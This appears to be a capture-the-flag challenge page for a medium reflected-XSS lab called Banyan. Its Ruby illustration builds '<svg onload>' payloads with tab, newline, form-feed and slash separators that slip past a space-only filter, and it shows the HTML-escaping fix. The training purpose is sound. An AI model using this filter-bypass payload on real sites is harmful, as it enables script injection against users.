WEBVERSE


Difficulty: medium · Category: Reflected XSS · Tier: Pro

Banyan

A community-garden app strips event handlers after a space. Only after a space.

The Scenario

Banyan coordinates community-garden plots. Its search endpoint reflects the query into the page and strips any on* attribute that is preceded by a space. The developer assumed every attribute boundary is whitespace. The HTML tokenizer does not agree: a slash between the tag name and the attribute works just as well.
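The following Ruby snippet is an added illustration, not Banyan's source: it reconstructs the kind of space-only filter the scenario describes, runs an `<svg onload>` payload through it with each separator the HTML tokenizer accepts between a tag name and its first attribute, and shows the output-encoding fix. The filter regex, the payload, and the helper names are assumptions; the separator set (space, tab, line feed, form feed, solidus) is what the tokenizer's "before attribute name" state accepts.

```ruby
require "cgi"

# Assumed reconstruction of the challenge's filter: it removes an
# on*=value attribute only when a literal space precedes it.
# This is an illustration, not the app's real code.
SPACE_ONLY_FILTER = / on\w+\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)/i

def naive_strip(input)
  input.gsub(SPACE_ONLY_FILTER, "")
end

# Characters the HTML tokenizer accepts between a tag name and its
# first attribute: the four HTML whitespace characters plus "/".
TAG_SEPARATORS = {
  "space"    => " ",
  "tab"      => "\t",
  "newline"  => "\n",
  "formfeed" => "\f",
  "solidus"  => "/",
}

# Inline <svg> runs its onload handler as soon as it is parsed,
# so no user interaction is needed. Payload is a constructed sample.
def payload_with(sep)
  "<svg#{sep}onload=alert(document.domain)>"
end

# Does the string still contain a tag carrying an on* handler, read
# the way the tokenizer reads it (any accepted separator, not just space)?
LIVE_HANDLER = /<[a-z][a-z0-9]*[ \t\n\f\/]+on\w+\s*=/i

def live_handler?(html)
  !!(html =~ LIVE_HANDLER)
end

# Names of the separators whose payload survives the filter intact.
def bypassing_separators
  TAG_SEPARATORS.select { |_, sep| live_handler?(naive_strip(payload_with(sep))) }.keys
end

# The actual fix: do not strip, encode for the HTML text context.
# Every "<" becomes "&lt;", so no tag (and no handler) is ever created.
def safe_render(input)
  CGI.escapeHTML(input)
end

if __FILE__ == $0
  puts "filter misses: #{bypassing_separators.join(', ')}"
  puts "escaped:       #{safe_render(payload_with('/'))}"
end
```

Only the space-separated payload is caught; tab, line feed, form feed and slash all slip through, which is why adding "/" to the denylist would still leave three holes. In a Sinatra handler the same encoding is available as `Rack::Utils.escape_html`; apply it at the point of output rather than trying to enumerate what the tokenizer will accept.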

Challenge Intel

Synopsis

An inline `<svg>` fires its `onload` handler as soon as it is parsed, no click required. The filter only strips `on*=` attributes that follow a literal space.

What It Is

A Sinatra garden-plot app with an overly-confident regex on its search input.

Who It's For

Someone ready to see SVG as a scripting-capable tag.

Skills You'll Practice

  • SVG-based XSS
  • Slash as HTML attribute separator
  • Reading regex boundaries carefully

What You'll Gain

  • Knowledge that HTML accepts several characters besides a space between a tag name and its attributes: tab, line feed, form feed and the slash
  • Another filter-bypass pattern in the toolkit

Ready to hack Banyan?

Upgrade to Pro to unlock this challenge and the full library.